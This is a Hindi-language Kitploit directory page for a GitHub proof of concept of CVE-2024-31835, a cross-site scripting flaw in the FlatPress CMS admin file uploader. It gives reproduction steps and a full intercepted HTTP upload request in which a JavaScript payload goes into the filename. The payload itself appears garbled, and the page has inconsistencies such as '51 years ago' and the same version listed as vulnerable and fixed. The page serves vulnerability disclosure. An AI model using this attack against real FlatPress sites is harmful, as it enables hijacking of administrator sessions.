Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-31835 — Flatpress CMS Flatpress v1.3 में Cross Site Scripting भेद्यता एक remote attacker को craftedpayload के माध्यम से file name parameter पर arbitrary code निष्पादित करने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/paragbagul111/cve-2024-31835
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubparagbagul111/cve-2024-31835

CVE-2024-31835

Flatpress CMS Flatpress v1.3 में Cross Site Scripting भेद्यता एक remote attacker को craftedpayload के माध्यम से file name parameter पर arbitrary code निष्पादित करने की अनुमति देती है।

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-31835

फ्लैटप्रेस CMS Flatpress v1.3 में क्रॉस साइट स्क्रिप्टिंग भेद्यता एक दूरस्थ हमलावर को फ़ाइल नाम पैरामीटर में क्राफ्टेड पेलोड के माध्यम से मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित घटक: FlatPress CMS एडमिन पैनल फ़ाइल अपलोड फ़ील्ड

निश्चित संस्करण: Flatpress v1.3 - FlatPress संस्करण 1.3 में ठीक किया जाएगा।

हमला प्रकार: दूरस्थ

हमला वेक्टर: इमेज फ़ाइलनाम को क्राफ्ट करके भेद्यता का शोषण करें

पुनरुत्पादन के चरण:

  1. एडमिन खाते में लॉगिन करें और नीचे दिए गए URL को खोलें http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader&action=mediamanager
  2. अपलोड फ़ील्ड पर क्लिक करें, कोई भी फ़ाइल अपलोड करें जो आप चाहते हैं, अपलोड पर क्लिक करें और burpsuite के साथ अनुरोध को इंटरसेप्ट करें, अनुरोध नीचे दिए गए जैसा दिखेगा, फ़ाइलनाम में जावास्क्रिप्ट पेलोड इंजेक्ट करें testtest

अनुरोध उदाहरण

root@kitploit:~
POST /flatpress-1.2.1/admin.php?p=uploader&action=default HTTP/1.1
Host: 127.0.0.1
Content-Length: 1598
Cache-Control: max-age=0
sec-ch-ua: "Not A(Brand";v="24", "Chromium";v="110"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHnyH0cX0ojRbqom
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/flatpress-1.2.1/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-9b0a379a=parag; fppass_fp-9b0a379a=%242y%2410%24j.D1Ab.xVMoIDu9yQF8QjefOZmz9JPoh4QwzpoCdYxlqSkNQDGag2; fpsess_fp-9b0a379a=mg65h4rd8onvv2tniminpq635f
Connection: close

------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wpnonce"
60f24876be
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="_wp_http_referer"
/flatpress-1.2.1/admin.php?p=uploader
------WebKitFormBoundaryzHnyH0cX0ojRbqom
Content-Disposition: form-data; name="upload[]"; filename="test.phpuh9aeairjipc8brr"
Content-Type: application/x-php

TEst
------WebKitFormBoundaryzHnyH0cX0ojRbqom--

संदर्भ:

https://portswigger.net/web-security/cross-site-scripting https://drive.google.com/file/d/1OthtP87MduNTYur_p0RZv3moY8CrBcaM/view

उत्पाद का विक्रेता: flatpress CMS

पुष्टि की गई: 11/06/2023

खोजकर्ता: Parag Bagul

टूल डाउनलोड करें